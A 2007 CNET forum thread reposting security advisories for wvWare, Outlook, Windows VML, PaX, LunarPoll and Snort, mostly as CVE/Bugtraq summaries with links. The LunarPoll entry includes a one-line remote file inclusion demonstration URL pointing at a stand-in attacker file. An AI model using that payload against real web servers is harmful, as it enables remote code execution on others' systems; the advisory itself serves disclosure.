Spyware, Viruses, & Security forum

General discussion

VULNERABILITIES - January 13, 2007

wvWare Multiple Integer Overflow Vulnerabilities


Bugtraq ID: 20761
Class: Boundary Condition Error
CVE: CVE-2006-4513

Remote: Yes

Updated: Jan 13 2007 12:00AM
Credit: infamous41md is credited with discovering these vulnerabilities.

http://www.securityfocus.com/bid/20761

Discussion is locked
You are posting a reply to: VULNERABILITIES - January 13, 2007
The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our CNET Forums policies for details. All submitted content is subject to our Terms of Use.
Track this discussion and email me when there are updates

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

You are reporting the following post: VULNERABILITIES - January 13, 2007
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Collapse -
Microsoft Outlook VEVENT Record Remote Code Execution Vulner

In reply to: VULNERABILITIES - January 13, 2007

Microsoft Outlook VEVENT Record Remote Code Execution Vulnerability

Bugtraq ID: 21931
Class: Boundary Condition Error
CVE: CVE-2007-0033

Remote: Yes

Updated: Jan 13 2007 12:20AM
Credit: Lurene Grenier of Sourcefire reported this issue to the vendor.

http://www.securityfocus.com/bid/21931

Collapse -
Microsoft Outlook Malformed Email Header Remote Denial of Se

In reply to: VULNERABILITIES - January 13, 2007

Microsoft Outlook Malformed Email Header Remote Denial of Service Vulnerability


Bugtraq ID: 21937
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2006-1305

Remote: Yes

Updated: Jan 13 2007 12:20AM
Credit: The vendor disclosed this issue.

http://www.securityfocus.com/bid/21937

Collapse -
Microsoft Windows Vector Markup Language Buffer Overrun Vuln

In reply to: VULNERABILITIES - January 13, 2007

Microsoft Windows Vector Markup Language Buffer Overrun Vulnerability


Bugtraq ID: 21930
Class: Boundary Condition Error
CVE: CVE-2007-0024

Remote: Yes

Updated: Jan 13 2007 12:30AM
Credit: Jospeh Moti is credited with the discovery of this vulnerability.

http://www.securityfocus.com/bid/21930

Collapse -
PaX expand_stack() Lets Local Users Gain Root Privileges

In reply to: VULNERABILITIES - January 13, 2007

SecurityTracker Alert ID: 1017509
SecurityTracker URL: http://securitytracker.com/id?1017509
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Jan 12 2007

Impact: Root access via local system

Description: A vulnerability was reported in PaX. A local user can obtain root privileges on the target system.

A local user can exploit a flaw in expand_stack() to obtain root privileges on the target system.

The original advisory is available at:

http://www.digitalarmaments.com/pre2007-00018659.html

Impact: A local user can obtain root privileges on the target system.

Solution: No solution was available at the time of this entry.

Vendor URL: pax.grsecurity.net/ (Links to External Site)

Cause: Not specified

Underlying OS: Linux (Any)

Reported By: info@digitalarmaments.com

http://www.securitytracker.com/alerts/2007/Jan/1017509.html

Collapse -
LunarPoll Include File Bug in 'show.php' Lets Remote Users E

In reply to: VULNERABILITIES - January 13, 2007

LunarPoll Include File Bug in 'show.php' Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1017510
SecurityTracker URL: http://securitytracker.com/id?1017510
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Jan 12 2007

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 1.0

Description: A vulnerability was reported in LunarPoll. A remote user can include and execute arbitrary code on the target system.

The 'show.php' script does not properly validate user-supplied input in the 'PollDir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit is provided:

http://[target]/show.php?PollDir=http://atta cker.txt?

ilker Kandemir reported this vulnerability.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.

Vendor URL: dexxaboy.com/scripts/lunarpoll/ (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: ilkerKandemir@mynet.com

http://www.securitytracker.com/alerts/2007/Jan/1017510.html

Collapse -
Snort Vulnerabilities

In reply to: VULNERABILITIES - January 13, 2007

Published: 2007-01-13,
Last Updated: 2007-01-13 19:50:51 UTC
by Koon Tan (Version: 1)
Two vulnerabilities are reported recently. One is pertaining to Rule Matching Backtrack Denial of Service Vulnerability. A attacker may cause denial of service, which could allow the remote user to evade detection. This issue is fixed in v2.6.1.

http://www.snort.org/pub-bin/snortnews.cgi#591
http://www.cs.wisc.edu/~smithr/pubs/acsac2006.pdf

The other one, affecting Snort 2.6.1.2, is due to an integer underflow that may allow a remote attacker to cause Snort to read beyond a specified length of memory, potentially corrupting logfiles.

Read more: http://isc.sans.org/diary.html

Popular Forums

icon
Computer Newbies 10,686 discussions
icon
Computer Help 54,365 discussions
icon
Laptops 21,181 discussions
icon
Networking & Wireless 16,313 discussions
icon
Phones 17,137 discussions
icon
Security 31,287 discussions
icon
TVs & Home Theaters 22,101 discussions
icon
Windows 7 8,164 discussions
icon
Windows 10 2,657 discussions

SMART HOME

This one tip will help you sleep better tonight

A few seconds are all you need to get a better night's rest.